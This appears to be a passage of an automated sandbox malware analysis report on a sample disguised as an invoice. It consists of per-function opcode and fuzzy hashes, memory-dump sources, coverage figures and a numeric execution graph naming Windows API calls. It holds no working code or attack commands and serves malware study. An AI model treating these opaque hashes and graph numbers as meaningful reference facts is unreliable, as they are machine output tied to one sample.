                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a05eb852619e3e40301e95e3b52789b59a748aa41755b0f81ef3f8118cd4ef88
                                            • Instruction ID: 82b8f3df531d5294a097fc6655b7fe6e06e033734570e9d41ea6818a246dfa63
                                            • Opcode Fuzzy Hash: a05eb852619e3e40301e95e3b52789b59a748aa41755b0f81ef3f8118cd4ef88
                                            • Instruction Fuzzy Hash: 3EE0FE78E04258DF9B50DFD8C58099CFBF2FF48310B10845A981AAB349D736A94ADF50
                                            Function 0AB28840 Relevance: .0, Instructions: 14COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1797b80309664d9140e828834461b3862d4e6507ea152c4d3a045b26dee60db2
                                            • Instruction ID: 9b1427e6ea55b59ed1a040762415ea0d39344151f3c49beaaca0d95c95635ef4
                                            • Opcode Fuzzy Hash: 1797b80309664d9140e828834461b3862d4e6507ea152c4d3a045b26dee60db2
                                            • Instruction Fuzzy Hash: 6CD012361501189E5B80FED4E800C527BDCFB186007408873E54CCB422EB22F434EB91
                                            Function 0AB2896F Relevance: .0, Instructions: 13COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 81f0642ba8717575afe58238f319aa3a7dcf155173ababa71c887a3c52c1c8cd
                                            • Instruction ID: 7b84d23ef57729d915d9a4187ffc385a2223bdbec2917194f8bbb6d0a446ac25
                                            • Opcode Fuzzy Hash: 81f0642ba8717575afe58238f319aa3a7dcf155173ababa71c887a3c52c1c8cd
                                            • Instruction Fuzzy Hash: 09D06778A0866C9FDB20DB95D8807AAB7B1BF46340F0061D5D18AAB205D7745A41DF42
                                            Function 0AB22040 Relevance: .0, Instructions: 13COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d651e86746992a3402b3be36ee11e98cdbe711b4489e4bf172f70270fbca925
                                            • Instruction ID: 5c7cc39683ecc80a67950210e7edc180677ea6f90ed4728f16301e1030daacde
                                            • Opcode Fuzzy Hash: 7d651e86746992a3402b3be36ee11e98cdbe711b4489e4bf172f70270fbca925
                                            • Instruction Fuzzy Hash: A8C012322000287B8A01AF85D800CC6BBADAF9A654304C096E50C8B121D622E912A7D0
                                            Function 0AB234E6 Relevance: .0, Instructions: 13COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5803be27423a2fb1646bcba80ed582d7ede46508289937191b7c2e8ca4841b5b
                                            • Instruction ID: 06072594e46d567079988d599b611e0613fe95529a09ac1d48d76be649e9be72
                                            • Opcode Fuzzy Hash: 5803be27423a2fb1646bcba80ed582d7ede46508289937191b7c2e8ca4841b5b
                                            • Instruction Fuzzy Hash: 18D01230B04524F7F76476608D964297AD1AA44161744C4EBE90F5E256EF3D8802B792
                                            Function 0AB27E10 Relevance: .0, Instructions: 11COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 469c6b98b58096de5a7fff1e8e312c7e414c58a291f2b848c97522fd330b2621
                                            • Instruction ID: 091cb88a324eb77aef4427aa574c1851d83cedff0707afc77efd6745cb3451fd
                                            • Opcode Fuzzy Hash: 469c6b98b58096de5a7fff1e8e312c7e414c58a291f2b848c97522fd330b2621
                                            • Instruction Fuzzy Hash: F4C09237086221BAF106A6A0CD42FC95F12A7B0705F944227F34AA0660CB6F8732A726
                                            Function 0AB23C40 Relevance: .0, Instructions: 11COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2caf5416b814d710057129adf397962fdfe3622a26c82b87f2beab406d8aedfc
                                            • Instruction ID: 9295ef5f9258d6ba4557cbe2cce1cd358081d2df34c6efca09de1c1faa5fca40
                                            • Opcode Fuzzy Hash: 2caf5416b814d710057129adf397962fdfe3622a26c82b87f2beab406d8aedfc
                                            • Instruction Fuzzy Hash: 6EC08C3040E21CF7EA20EE80C80966CB3EC9780300F0000D7C80D1B701CA391E007392
                                            Function 0AB2AAB0 Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 845828234aa892e8f03c63d57173f925d1a3da545414f16893547b7e768107ff
                                            • Instruction ID: 3e5af4a7748bd342386b466e59c0d13903f39786fffe3bd65df94235ac59b89c
                                            • Opcode Fuzzy Hash: 845828234aa892e8f03c63d57173f925d1a3da545414f16893547b7e768107ff
                                            • Instruction Fuzzy Hash: FBC08C300606D48BF71427A0B50D3283B68BB01206F400264A10E408A1CFA08488DA51
                                            Function 0AB2AAAE Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 14ed725c7f351da585079924a72969c486e9da6f5bba09cb10f67cb6c5d35305
                                            • Instruction ID: f38bf0d99106e3eb695dea44ee813e393d08ce52e261a5cd9bcd6b13287c9ca9
                                            • Opcode Fuzzy Hash: 14ed725c7f351da585079924a72969c486e9da6f5bba09cb10f67cb6c5d35305
                                            • Instruction Fuzzy Hash: 05C012340641908BEB04AB60FAD986C7F24FA022067600AAAE40BC10A2C7288881CA80
                                            Function 0AB2EBBC Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c4377d9ebfee6d53558ed915a94e978627f64d3b51b28ab751d937c9bba28c69
                                            • Instruction ID: e5aa4eb6008880fa52b415a63ca9afea989ca9e779ccea320bb344182f1563cc
                                            • Opcode Fuzzy Hash: c4377d9ebfee6d53558ed915a94e978627f64d3b51b28ab751d937c9bba28c69
                                            • Instruction Fuzzy Hash: 62D01234C142609FF700DF65D08499EBFB5FB063413006296D41A87321C7308443DF00
                                            Function 0AB284F5 Relevance: .0, Instructions: 9COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1dfd1989ff1b96a12745be60cb6d923ebcead3b1e53cc8d61e931c71702fb8c3
                                            • Instruction ID: 963750f076d73e96287b425311d86e07826e0fac46375ae692769fd587ce20d8
                                            • Opcode Fuzzy Hash: 1dfd1989ff1b96a12745be60cb6d923ebcead3b1e53cc8d61e931c71702fb8c3
                                            • Instruction Fuzzy Hash: F5C02B30704855DB2324DAD042410266AE2F7D8200718C497C09BDF245C430D501FB10
                                            Function 0AB244D4 Relevance: .0, Instructions: 9COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c72e6d82d2b8349765de73cdcd497d9a27447330e6032b4619bb52c46555568e
                                            • Instruction ID: 7eeaa8819d6d13881f091576b095c4692595b671dac585e57dd18118404a4754
                                            • Opcode Fuzzy Hash: c72e6d82d2b8349765de73cdcd497d9a27447330e6032b4619bb52c46555568e
                                            • Instruction Fuzzy Hash: 75C08C3A002004AAA200AF008A80855BBA0FF48300B809C87E20801022CA20C518A701
                                            Function 0AB25418 Relevance: .0, Instructions: 9COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ddf91450f8bd677722607d7f0003c760b1a99b286329715d08dc93f8b701c65b
                                            • Instruction ID: 6a29a21a6a24567fc7e167b9d754385d0bd89b1440dbafa505e4d8fe66d01f83
                                            • Opcode Fuzzy Hash: ddf91450f8bd677722607d7f0003c760b1a99b286329715d08dc93f8b701c65b
                                            • Instruction Fuzzy Hash: 19D01270D0822CCFEB20CF91C8446EDBBB1BF08301F204106D42AA3280D778AD42CF00
                                            Function 0AB2688C Relevance: .0, Instructions: 8COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b2b33c7957f545fbce81d67a0e376e9e2283f20fac9c3efcccd60a017c8732de
                                            • Instruction ID: 83155895acfb2616fcd6cc2fba4efac2ac26f375af29da72693e756cb7435b26
                                            • Opcode Fuzzy Hash: b2b33c7957f545fbce81d67a0e376e9e2283f20fac9c3efcccd60a017c8732de
                                            • Instruction Fuzzy Hash: 50B09235195120E1B0083BA849D0AAB6911EBA9700B809857A349140808AA04965A33E
                                            Function 0AB26588 Relevance: .0, Instructions: 7COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 901eea7fff93af3d5f35b2f36bc18818df992b13d0ffa7811e896ffcd2d551b7
                                            • Instruction ID: e6b8678b7b3ecb9c4b436af4c57392ce58601adc0514cd1fb8eda142a1355684
                                            • Opcode Fuzzy Hash: 901eea7fff93af3d5f35b2f36bc18818df992b13d0ffa7811e896ffcd2d551b7
                                            • Instruction Fuzzy Hash: 57B0923E2110209EAA02AFA8E904C08BBA1FF687043848092E1A44B073CAA5C429AB84

                                            Non-executed Functions

                                            Function 0AB2F848 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ecac2c919c312b373a564991559c41cc6e721be5645f448a75fbf9d62592314
                                            • Instruction ID: 86d14a8b5dea61c5e89b50d890f6fb25b023f816cee47e0a2e1a8b246af27854
                                            • Opcode Fuzzy Hash: 5ecac2c919c312b373a564991559c41cc6e721be5645f448a75fbf9d62592314
                                            • Instruction Fuzzy Hash: 2DE11E74E041698FDB14DFA9C590AAEFBB2FF89304F24816AD419AB355D7309D82CF60
                                            Function 0AB2EFD8 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc92645ac50023eed6b25888b247c6e0372ff21af76cc73fd68bcaaa7773236b
                                            • Instruction ID: c15c6680baee7e6d00d2b8c4d4d975c9dd3b8ae4f256bccd0cdc335bb971ef8f
                                            • Opcode Fuzzy Hash: fc92645ac50023eed6b25888b247c6e0372ff21af76cc73fd68bcaaa7773236b
                                            • Instruction Fuzzy Hash: 5AE1EE74E141698FDB14DFA9C580AAEFBB2FF49304F24826AD418AB355D7309D82DF60
                                            Function 0AB2F410 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ff8e89286dfde11316c5324d44a6bec044bc37b851c33e0eb28b2ca06ffda3f1
                                            • Instruction ID: 7c4a892e0ea4ef1ab16f9761f1b9b7dee8c7c802dad1a68e435c903d47a96a4f
                                            • Opcode Fuzzy Hash: ff8e89286dfde11316c5324d44a6bec044bc37b851c33e0eb28b2ca06ffda3f1
                                            • Instruction Fuzzy Hash: 58E1FD74E041698FDB14DFA9C590AAEFBB2FF49304F24815AD418AB355D730AD82CF60
                                            Function 04A51198 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2142465173.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4a50000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b0b3bd0dcaf3dcceeaaa49bf17c956eb6e7804e76c06123b134dc1362920cb1c
                                            • Instruction ID: edb5e6819696d83a649117b8a5d91f10056bb8025c3a789e4ffb9b7d84748060
                                            • Opcode Fuzzy Hash: b0b3bd0dcaf3dcceeaaa49bf17c956eb6e7804e76c06123b134dc1362920cb1c
                                            • Instruction Fuzzy Hash: A9E1FA74E002598FDB14DFA9C590AAEBBB2FF49314F248269D815AB355D730AD82CF60
                                            Function 04A51AC8 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2142465173.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4a50000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05c9b3c67edbde0fded2698061c42d8aed75f9e1164e62d1fcddac11634d5632
                                            • Instruction ID: ae6d5cadce738f931fc00220a564d1e9d8213514b899742c9ae5b37b46149a2d
                                            • Opcode Fuzzy Hash: 05c9b3c67edbde0fded2698061c42d8aed75f9e1164e62d1fcddac11634d5632
                                            • Instruction Fuzzy Hash: E9E1FC74E042598FDB14DFA9C580AAEFBB2FF89304F248259D814AB355D771AD82CF60
                                            Function 0AB27618 Relevance: .3, Instructions: 270COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e4b013129db3477d5039c912fc226118a7de8800b3348c31c6a0c62ec68bd492
                                            • Instruction ID: 692ec844efd22264d6e12689659f1581eabc4e4cb15f2335c1c45164ec511f9c
                                            • Opcode Fuzzy Hash: e4b013129db3477d5039c912fc226118a7de8800b3348c31c6a0c62ec68bd492
                                            • Instruction Fuzzy Hash: FCD1E93192079ACADB14EBA4D994B9DB771FFD5300F11879AE1493B251EF70AAC4CB40
                                            Function 00E8D444 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2138876022.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e80000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: de33a2c575d608e9d0684696ba28f33b42fd6b7ec0ef251419d2a0066161588f
                                            • Instruction ID: 59c2a4f012ddadcf8fc964f562ff1b67136cd6772fa851b6fd83c4814becbf85
                                            • Opcode Fuzzy Hash: de33a2c575d608e9d0684696ba28f33b42fd6b7ec0ef251419d2a0066161588f
                                            • Instruction Fuzzy Hash: 83A14C36E00219CFCF05EFA4C84459EB7B2FF85304B25957AE809BB266DB71D956CB40
                                            Function 0AB27628 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 19548787a3dd50e0fa7362463fa5fe82a37da397e6aa407e6f1e73100b50bab6
                                            • Instruction ID: 13525964ef4ca3bb7ac5ee61cdf9bb49f61b1a9e0c2ac24af8d3976219e7e536
                                            • Opcode Fuzzy Hash: 19548787a3dd50e0fa7362463fa5fe82a37da397e6aa407e6f1e73100b50bab6
                                            • Instruction Fuzzy Hash: FCD1E93192079ACADB14EBA4D994AADB771FFD5300F11879AE1493B251EF70AAC4CB40
                                            Function 0AB2F403 Relevance: .1, Instructions: 132COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ec282cd20ff6c2b5be9c13e7215b8714ed43b1dd5e7a9e9f329c28a6d4927163
                                            • Instruction ID: a5f836e2ed4b68beaf93a4e8aecf662bfdf3a14d92b439acb568df53787510a0
                                            • Opcode Fuzzy Hash: ec282cd20ff6c2b5be9c13e7215b8714ed43b1dd5e7a9e9f329c28a6d4927163
                                            • Instruction Fuzzy Hash: AF511D70E042598FDB14DFA9D9849AEFBF2FF89304F24816AD418AB315D7309942CFA1
                                            Function 0AB2F839 Relevance: .1, Instructions: 131COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 461e2d1bc653a408ed1726415e638bdc7bf8631ca7248ccbbc83df92d18df963
                                            • Instruction ID: 8c9284e7de12e1b3a257282c5acd035dcaf6b81444a2c2cb7020a0c55659e7dd
                                            • Opcode Fuzzy Hash: 461e2d1bc653a408ed1726415e638bdc7bf8631ca7248ccbbc83df92d18df963
                                            • Instruction Fuzzy Hash: 46510C74E042199FDB14DFA9C9806AEFBF2FF89304F24816AD418AB215D7309942CF61

                                            Execution Graph

                                            Execution Coverage:1.4%
                                            Dynamic/Decrypted Code Coverage:2.7%
                                            Signature Coverage:5.9%
                                            Total number of Nodes:556
                                            Total number of Limit Nodes:71
                                            execution_graph 98914 41f120 98917 41b970 98914->98917 98918 41b996 98917->98918 98925 409d40 98918->98925 98920 41b9a2 98921 41b9c3 98920->98921 98933 40c1c0 98920->98933 98923 41b9b5 98969 41a6b0 98923->98969 98972 409c90 98925->98972 98927 409d54 98927->98920 98928 409d4d 98928->98927 98984 409c30 98928->98984 98934 40c1e5 98933->98934 99396 40b1c0 98934->99396 98936 40c23c 99400 40ae40 98936->99400 98938 40c262 98968 40c4b3 98938->98968 99409 4143a0 98938->99409 98940 40c2a7 98940->98968 99412 408a60 98940->99412 98942 40c2eb 98942->98968 99419 41a500 98942->99419 98946 40c341 98947 40c348 98946->98947 99431 41a010 98946->99431 98948 41bdc0 2 API calls 98947->98948 98950 40c355 98948->98950 98950->98923 98952 40c392 98953 41bdc0 2 API calls 98952->98953 98954 40c399 98953->98954 98954->98923 98955 40c3a2 98956 40f4a0 3 API calls 98955->98956 98957 40c416 98956->98957 98957->98947 98958 40c421 98957->98958 98959 41bdc0 2 API calls 98958->98959 98960 40c445 98959->98960 99437 41a060 98960->99437 98963 41a010 2 API calls 98964 40c480 98963->98964 98964->98968 99442 419e20 98964->99442 98967 41a6b0 2 API calls 98967->98968 98968->98923 98970 41a6cf ExitProcess 98969->98970 98971 41af60 LdrLoadDll 98969->98971 98971->98970 98973 409ca3 98972->98973 99023 418bc0 LdrLoadDll 98972->99023 99003 418a70 98973->99003 98976 409cb6 98976->98928 98977 409cac 98977->98976 99006 41b2b0 98977->99006 98979 409cf3 98979->98976 99017 409ab0 98979->99017 98981 409d13 99024 409620 LdrLoadDll 98981->99024 98983 409d25 98983->98928 99371 41b5a0 98984->99371 98987 41b5a0 LdrLoadDll 98988 409c5b 98987->98988 98989 41b5a0 LdrLoadDll 98988->98989 98990 409c71 98989->98990 98991 40f180 98990->98991 98992 40f199 98991->98992 99379 40b040 98992->99379 98994 40f1ac 99383 41a1e0 98994->99383 98998 40f1d2 99001 40f1fd 98998->99001 99389 41a260 98998->99389 99000 41a490 2 API calls 99002 409d65 99000->99002 99001->99000 99002->98920 99025 41a600 99003->99025 99007 41b2c9 99006->99007 99038 414a50 99007->99038 99009 41b2e1 99010 41b2ea 99009->99010 99077 41b0f0 99009->99077 99010->98979 99012 41b2fe 99012->99010 99095 419f00 99012->99095 99348 407ea0 99017->99348 99019 409ad1 99019->98981 99020 409aca 99020->99019 99361 408160 99020->99361 99023->98973 99024->98983 99028 41af60 99025->99028 99027 418a85 99027->98977 99029 41af70 99028->99029 99031 41af92 99028->99031 99032 414e50 99029->99032 99031->99027 99033 414e5e 99032->99033 99034 414e6a 99032->99034 99033->99034 99037 4152d0 LdrLoadDll 99033->99037 99034->99031 99036 414fbc 99036->99031 99037->99036 99039 414d85 99038->99039 99041 414a64 99038->99041 99039->99009 99041->99039 99103 419c50 99041->99103 99043 414b90 99106 41a360 99043->99106 99044 414b73 99163 41a460 LdrLoadDll 99044->99163 99047 414b7d 99047->99009 99048 414bb7 99049 41bdc0 2 API calls 99048->99049 99051 414bc3 99049->99051 99050 414d49 99053 41a490 2 API calls 99050->99053 99051->99047 99051->99050 99052 414d5f 99051->99052 99057 414c52 99051->99057 99172 414790 LdrLoadDll NtReadFile NtClose 99052->99172 99054 414d50 99053->99054 99054->99009 99056 414d72 99056->99009 99058 414cb9 99057->99058 99060 414c61 99057->99060 99058->99050 99059 414ccc 99058->99059 99165 41a2e0 99059->99165 99062 414c66 99060->99062 99063 414c7a 99060->99063 99164 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 99062->99164 99066 414c7f 99063->99066 99070 414c97 99063->99070 99109 4146f0 99066->99109 99068 414c70 99068->99009 99070->99054 99121 414410 99070->99121 99071 414d2c 99169 41a490 99071->99169 99072 414c8d 99072->99009 99075 414caf 99075->99009 99076 414d38 99076->99009 99079 41b101 99077->99079 99078 41b113 99078->99012 99079->99078 99192 41bd40 99079->99192 99081 41b134 99195 414070 99081->99195 99083 41b180 99083->99012 99084 41b157 99084->99083 99085 414070 3 API calls 99084->99085 99087 41b179 99085->99087 99087->99083 99220 415390 99087->99220 99088 41b20a 99090 41b21a 99088->99090 99314 41af00 LdrLoadDll 99088->99314 99230 41ad70 99090->99230 99092 41b248 99309 419ec0 99092->99309 99096 41af60 LdrLoadDll 99095->99096 99097 419f1c 99096->99097 99342 10c2c0a 99097->99342 99098 419f37 99100 41bdc0 99098->99100 99345 41a670 99100->99345 99102 41b359 99102->98979 99104 41af60 LdrLoadDll 99103->99104 99105 414b44 99103->99105 99104->99105 99105->99043 99105->99044 99105->99047 99107 41a37c NtCreateFile 99106->99107 99108 41af60 LdrLoadDll 99106->99108 99107->99048 99108->99107 99110 41470c 99109->99110 99111 41a2e0 LdrLoadDll 99110->99111 99112 41472d 99111->99112 99113 414734 99112->99113 99114 414748 99112->99114 99115 41a490 2 API calls 99113->99115 99116 41a490 2 API calls 99114->99116 99117 41473d 99115->99117 99118 414751 99116->99118 99117->99072 99173 41bfd0 LdrLoadDll RtlAllocateHeap 99118->99173 99120 41475c 99120->99072 99122 41445b 99121->99122 99123 41448e 99121->99123 99124 41a2e0 LdrLoadDll 99122->99124 99125 4145d9 99123->99125 99129 4144aa 99123->99129 99126 414476 99124->99126 99127 41a2e0 LdrLoadDll 99125->99127 99128 41a490 2 API calls 99126->99128 99132 4145f4 99127->99132 99130 41447f 99128->99130 99131 41a2e0 LdrLoadDll 99129->99131 99130->99075 99133 4144c5 99131->99133 99187 41a320 LdrLoadDll 99132->99187 99135 4144e1 99133->99135 99136 4144cc 99133->99136 99137 4144e6 99135->99137 99138 4144fc 99135->99138 99140 41a490 2 API calls 99136->99140 99142 41a490 2 API calls 99137->99142 99149 414501 99138->99149 99174 41bf90 99138->99174 99139 41462e 99143 41a490 2 API calls 99139->99143 99141 4144d5 99140->99141 99141->99075 99145 4144ef 99142->99145 99144 414639 99143->99144 99144->99075 99145->99075 99148 414567 99150 41457e 99148->99150 99186 41a2a0 LdrLoadDll 99148->99186 99156 414513 99149->99156 99177 41a410 99149->99177 99152 414585 99150->99152 99153 41459a 99150->99153 99154 41a490 2 API calls 99152->99154 99155 41a490 2 API calls 99153->99155 99154->99156 99157 4145a3 99155->99157 99156->99075 99158 4145cf 99157->99158 99181 41bb90 99157->99181 99158->99075 99160 4145ba 99161 41bdc0 2 API calls 99160->99161 99162 4145c3 99161->99162 99162->99075 99163->99047 99164->99068 99166 414d14 